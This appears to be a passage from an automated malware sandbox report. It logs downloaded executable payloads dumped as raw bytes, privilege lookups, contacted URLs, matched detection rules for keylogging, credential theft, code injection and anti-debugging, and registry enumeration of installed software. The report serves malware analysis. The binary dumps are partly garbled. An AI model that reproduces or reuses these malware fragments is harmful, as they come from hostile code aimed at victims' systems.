þ- 6><†%+ ¥ß%& î~Za8ƒýÿÿt  g¸ÙZ ¤°Õ a8iýÿÿ*0¾ ‡oø ¬wȧa% ^EˆJ+Ìÿÿÿi:8ƒ, vÄ£¹Z eiAa+º{þ+ þɨï+¦(# ¤ÁZÊ+— E× Z ùÔ«a+‡, 8~ %+ #ÅE%& ž¦Za8hÿÿÿ{( I‘FZ '˜!a8Iÿÿÿ*0 tÝòŒ ~Ĭa% ^E¬ýÿÿÜ?ˆÜÁ‘0 ýBÔ ³ï‡ ÇêH´2 f7Ç, æ6  È gæ Ï ×J ¥ ‹jSÕG¡ ÆeAäUÊGÙ¢a[ûC} f-C ~˜y®y JÛÈ[[ Tö I·å œ à ZZv¤ ^ ?a «ö@& ªhk¨¶å BÔ .üz 0Ó è1 ¾ ‡œ¥ V X—,t týy ìn×êy­ ¯8¥(G \ϾyZ Mš¡\a8“ýÿÿ(B(C ¶j¸'Z )DÕza8rýÿÿ(9 Î"z„Z êLÐVa8Yýÿÿ OӉZ  La8Fýÿÿ ›ïS+Z Íòa83ýÿÿ{(*" A(+(,&{(*" A(+(,& Ïo‘Z "Š†a8éüÿÿ ˜Ñ¼ºZ è±àa8Öüÿÿ{  J œs$ (& ínc1Z SÅ^a8ªüÿÿ åñZ uzra8—üÿÿ{(*" A(+(,& t€åZ â͕xa8iüÿÿ ø€Z 4ªèa8Vüÿÿ{ (%{ r]p"B(1(2 hÛÐ Z Èýâµa8üÿÿ{kPs% (-{(.{r9p(4 õ«Ý8Z ²FéÒa8Õûÿÿ{  (6 öΫZ ERPa8µûÿÿ u¦:šZ ë:Úa8¢ûÿÿ(} YÒ%Z ½ëóYa8…ûÿÿ S.òÆZ ‹¬ôEa8rûÿÿ{gNs% (- åaDýZ  Q}a8Kûÿÿ - Z U!ma88ûÿÿ(;{(< üÕ?Z /#Áa8ûÿÿ{þs& (7 l†‘Z …Ùa8ëúÿÿ ©?¦Z ȁ´ a8Øúÿÿ{(' (0 c+÷?Z ùÄ~)a8¶úÿÿ CÁûHZ hÜäa8£úÿÿ(( (0 9 œs% (: DžioZ F䀽a8púÿÿ{ (6 f8gZ tÉJa8Púÿÿ iNUÿZ ûµ%6a8=úÿÿ"À@"PAs) (8 :î½Z VS¨a8úÿÿ …»ËMZ ¢Pתa8úÿÿ{ Ýs$ (& Ñ$¹Z D·hLa8Úùÿÿ &ŸÆ¬Z Øç#Ža8Çùÿÿ o{õCZ $?ça8´ùÿÿ(} pCRZ ^™Ÿa8—ùÿÿ |weZ oa‡a8„ùÿÿ Áµ€¬Z ’÷¸a8qùÿÿ ™³ÔrZ —É@¦a8^ùÿÿ{r‡p(5 ÑgŽ¢Z 0.•ßa8;ùÿÿ{(#{($ âæ«ÕZ @&{pa8ùÿÿ Êc_=Z “Å×a8ýøÿÿ £èRÄZ A¢a8êøÿÿ{
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ à``îð@°@ œ ÐÒpW`CODE”Þà `DATALðä@ÀBSS‘öÀ.idataœ "ö@À.tlsPÀ.rdata`@P.relocWpX@P.rsrcÒÐÒr@P°D@P@Boolean@FalseTrue@,@Charÿ@@Integer€ÿÿÿ‹ÀX@Byteÿl@Wordÿÿ€@Cardinalÿÿÿÿ˜@ Stringì@ì@¨=@´=@¸=@¼=@°=@ü:@;@T;@TObjectø@TObjectì@System@ IInterfaceÀFSystemÿÿ̃D$øéqPƒD$øéPƒD$øé™PÌÌE@O@Y@ÀFe@@à@q@à@  @¨=@”a@ a@¼=@°=@°a@;@T;@TInterfacedObject‹Àÿ%Ð!E‹Àÿ%Ì!E‹Àÿ%È!E‹Àÿ%Ä!E‹Àÿ%À!E‹Àÿ%¼!E‹Àÿ%¸!E‹Àÿ%´!E‹Àÿ%°!E‹Àÿ%¬!E‹Àÿ%¨!E‹Àÿ%¤!E‹Àÿ%ä!E‹Àÿ% !E‹Àÿ%à!E‹Àÿ%œ!E‹Àÿ%˜!E‹Àÿ%”!E‹Àÿ%!E‹Àÿ%Œ!E‹Àÿ%ˆ!E‹Àÿ%„!E‹Àÿ%€!E‹Àÿ%|!E‹Àÿ%x!E‹Àÿ%t!E‹Àÿ%p!E‹Àÿ%Ü!E‹Àÿ%l!E‹Àÿ%h!E‹Àÿ%d!E‹Àÿ%ô!E‹Àÿ%ð!E‹Àÿ%ì!E‹Àÿ%`!E‹Àÿ%\!E‹Àÿ%"E‹Àÿ%"E‹Àÿ%ü!E‹Àÿ%X!E‹Àÿ%T!E‹Àÿ%P!E‹Àÿ%L!E‹ÀSƒÄ¼» TèYÿÿÿöD$,t·\$0‹ÃƒÄD[ËÀÿ%H!E‹Àÿ%D!E‹Àÿ%@!E‹Àÿ%<!E‹Àÿ%8!E‹Àÿ%4!E‹Àÿ%0!E‹Àÿ%,!E‹ÀSƒÄô»äEƒ;uYhDjè¦ÿÿÿ‰D$ƒ|$u3À‰$ëP‹D$‹àE‰‹D$£àE3À‹ÐҋL$TщT$‹T$‹ ‰ ‹T$‰@ƒødu܋‰D$‹D$‹‰‹D$‰$‹$ƒÄ [ɉ@ËÀSVƒÄø‹ò‹Øèfÿÿÿ‰D$ƒ|$u3Àë:‹‹T$‰B‹F‹T$‰B ‹‰$‹D$‹$‰‹D$‰X‹$‹T$‰P‹D$‰°YZ^[ÃÄø‹P‰$‹‰T$‹$‹L$‰ ‹T$‹ $‰J‹äE‰£äEYZËÀSVWUƒÄø‹Ù‹ð‹ü‹‰‹‰‹B‰C‹‹‰D$‹‹R‹Ê‹/M ‹;Èu‹èÿÿÿ‹‹@‰‹‹@ CëC;Ðu‹èqÿÿÿ‹‹@ C‹D$‰;7u®‹Ó‹Æèúþÿÿ„Àu3À‰YZ]_^[Í@SVWUƒÄð‰$‹ô‹‰D$ ‹ ‹‹@;È‚†‹Ø‹>_ ‹ùz;ßrv;Èu!‹B‹A‹B‹)B ‹ƒx uV‹èðþÿÿëM‹Ø‹>_ ‹ùz;ßu ‹B‹)B ë3‹Z‰\$‹>‹‹.} +û‰|$+ȋ‰H T$‹èMþÿÿ„Àu3Àë°ë‹‹‰‹;D$ …Yÿÿÿ3ÀƒÄ]_^[ÐSVW‹Ú‹ðþ}¾ë Æÿÿæÿÿ‰sjh Vjè4ýÿÿ‹ø‰;…ÿt#‹Ó¸èEèÜýÿÿ„Àuh€j‹Pèýÿÿ3À‰_^[ÐSVWU‹Ù‹ò‹èÇCjh hUèáüÿÿ‹ø‰;…ÿuÆÿÿæÿÿ‰sjh VUè¼üÿÿ‰ƒ;t#‹Ó¸èEèeýÿÿ„Àuh€j‹Pèžüÿÿ3À‰]_^[ÐSVWUƒÄè‹ù‹ôÇD$ÿÿÿÿ3ɉL$ ‰D$T$‰T$¡èE‰ëk‹‹‰D$‹‹X;\$rR‹Ã‹B ;D$wE;\$s‰\$‹‹h‹h ;l$ v‰l$ h€j‹‹@Pèüÿÿ…Àu ÇÄE‹èýÿÿ‹D$‰¸èE;uŒ3À‰ƒ|$ t‹D$‰‹D$ +D$‰GƒÄ]_^[ËÀSVWUƒÄè‹Ù‰$t$|$l$ ‹Ð‹Êáðÿÿ‰L$$Âÿâðÿÿ‰T$‹D$‰‹D$+D$‰C¡èE‰ë[‹‹@‰‹‹@ ‰E‹;D$s‹D$‰‹E;D$v‹D$‰E‹;Esjh‹E+P‹Pè&ûÿÿ…Àu3À‰ë‹‹‰¸èE;uœƒÄ]_^[ÐSVWUƒÄè‰$t$|$\$ ‹Ð‹êÅÿåðÿÿ‰l$$âðÿÿ‰T$‹D$‰‹D$+D$‰A¡èE‰ëX‹‹@‰‹‹@ ‰‹;D$s‹D$‰‹;D$v‹D$‰‹;s h@‹+P‹Pèwúÿÿ…Àu ÇÄE‹‹‰¸èE;uŸƒÄ]_^[ËÀSVWUƒÄô‹Ú‹ð‹ü½øEÆÿ?æÀÿÿ‹E‰ëA‹;p 4‹Ë‹‹@‹ÖèJþÿÿƒ;t_‹C‹B‹C‹)B ‹ƒx uG‹èûÿÿë>‹‹‰;/u»‹Ó‹Æèmüÿÿƒ;t&L$‹Ó‹Åèûÿÿƒ|$u’L$‹S‹è"ýÿÿ3À‰ƒÄ ]_^[ËÀSVWUƒÄè‰ $‹ú‹Øt$½øEÇÿ?çÀÿÿ‹E‰ë‹‹‰;.t‹;Xuï‹;Xu_‹;x Žœ‹‹×+P ‹‹@‹A L$è5üÿÿƒ|$t3L$T$‹Åèoúÿÿƒ|$uŸL$‹T$ ‹D$èüÿÿ‹$3҉隍L$‹×‹Ãèîûÿÿƒ|$t4L$T$‹Åè(úÿÿƒ|$…TÿÿÿL$‹T$ ‹D$è4üÿÿ‹$3҉ëR‹‹h;ÝuB‹;x ;‹ $‹Å‹×è×üÿÿ‹$ƒ8t.‹$‹@‹B‹$‹@‹)B ‹ƒx u‹è†ùÿÿë‹$3҉ƒÄ]_^[ÐSƒÄè‹Ùˆÿ?áÀÿÿ‰ $ЁâÀÿÿ‰T$‹D$;$v_‹Ë‹T$+$‹$èýÿÿL$‹Ó¸øEè]ùÿÿ‹\$…ÛtL$‹T$ ‹Ãènûÿÿ‹D$‰D$‹D$‰D$ ƒ|$tT$¸øEè©ùÿÿë3À‰ƒÄ[ËÀU‹ìQ3ÒUh€@dÿ2d‰"hÈEè¼÷ÿÿ€=IEt hÈEè±÷ÿÿ¸èEèCøÿÿ¸øEè9øÿÿ¸$E
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!  ¶b—¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELê˜=Sv? à! ÐàXà` 8à  °˜ÐL ü'ð¬Ñp.textÀÎÐ`0`.data°àÖ@@À.rdata$­ð®æ@@@.bss˜ €@À.edata˜°”@0@.idataL Ð ®@0À.CRTàº@0À.tls ð¼@0À.relocü'(¾@0B/4`0æ@@B/19È@è@B/35MPì@B/51`C`Dô@B/63„ °8@B/77” À F@B/89ÐR
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/„‘AV„‘AV„‘AVéÒVˆ‘AV]ó@W†‘AV1†V…‘AV]óBW€‘AV]óDW‘AV]óEW‘AV¦ñ@W€‘AVOò@W‡‘AV„‘@V֑AVOòBW†‘AVOòEWÀ‘AVOòAW…‘AVOò¾V…‘AVOòCW…‘AVRich„‘AVPELØbë[à"!  Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTˆâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÂU±É£;âÉ£;âÉ£;âÀÛ¨âÙ£;âWüâË£;âÁ8ãÇ£;âÁ?ã£;âÁ:ãÍ£;âÁ>ãÛ£;âëÃ:ãÀ£;âÉ£:âw£;âÀ?ãÈ£;âÀ>ãÝ£;âÀ;ãÈ£;âÀÄâÈ£;âÀ9ãÈ£;âRichÉ£;âPELÄ_ë[à"!  z†à‚@3@A@Àt´Þ, xúÐ0h ¹TT¹h¸@ôl¾€.textÊxz `.rdata^ef~@@.data¼ ä@À.didat8æ@À.rsrcx è@@.reloch 0ì@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¦È¼Aâ©Òâ©Òâ©ÒV5=à©ÒëÑAú©Ò;ËÓá©Òâ©Ó"©Ò;ËÑë©Ò;ËÖî©Ò;Ë×ô©Ò;ËÚ•©Ò;ËÒã©Ò;Ë-ã©Ò;ËÐã©ÒRichâ©ÒPEL8'Yà"!  ‚P±  Ðaz@AðC‚ÏôR,€øx8?4:ðf8È(@Pð˜@@.textr `.data( @À.idata6P @@.didat4p6@À.rsrcø€8@@.reloc4:<<@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $#ƒ4ŒgâZßgâZßgâZßnšÉßsâZß¾€[ÞeâZßùBßcâZß¾€YÞjâZß¾€_ÞmâZß¾€^ÞlâZßE‚[ÞoâZ߬[ÞdâZßgâ[ߐâZ߬^ÞmãZ߬ZÞfâZ߬¥ßfâZ߬XÞfâZßRichgâZßPEL­bë[à"!  êwð@·»@ˆ ˆ=T°pæÐÀ}p—Tȗ@ø.textèê `.rdataRTî@@.datatG`"B@À.rsrcp°d@@.reloc}À~h@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $ù£NE˜ÍE˜ÍE˜Íñ"G˜ÍLà^N˜ÍE˜Ìl˜ÍœúÉU˜ÍœúÎV˜ÍœúÈA˜ÍœúÅ_˜ÍœúÍD˜Íœú2D˜ÍœúÏD˜ÍRichE˜ÍPEL 8'Yà"!  ê ® @¼@A°ð ÀŒ H?0” °8è@¼.textÄéê `.dataDî@À.idata¸ð@@.rsrc ö@@.reloc” 0 ü@B
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0012f000', u'virtual_address': u'0x00001000', u'entropy': 7.349543054331128, u'name': u'.text', u'virtual_size': u'0x0012e984'} entropy 7.34954305433 description A section with a high entropy has been found
entropy 0.993442622951 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://ip-api.com/json
url https://dotbit.me/a/
description Communication using DGA rule Network_DGA
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Create a windows service rule Create_Service
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Escalate priviledges rule Escalate_priviledges
description Run a KeyLogger rule KeyLogger
description Communications over FTP rule Network_FTP
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Steal credential rule local_credential_Steal
description Take ScreenShot rule ScreenShot
description File Downloader rule Network_Downloader
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000510
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000670
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0412-0000-0000000FF1CE}
1 0 0

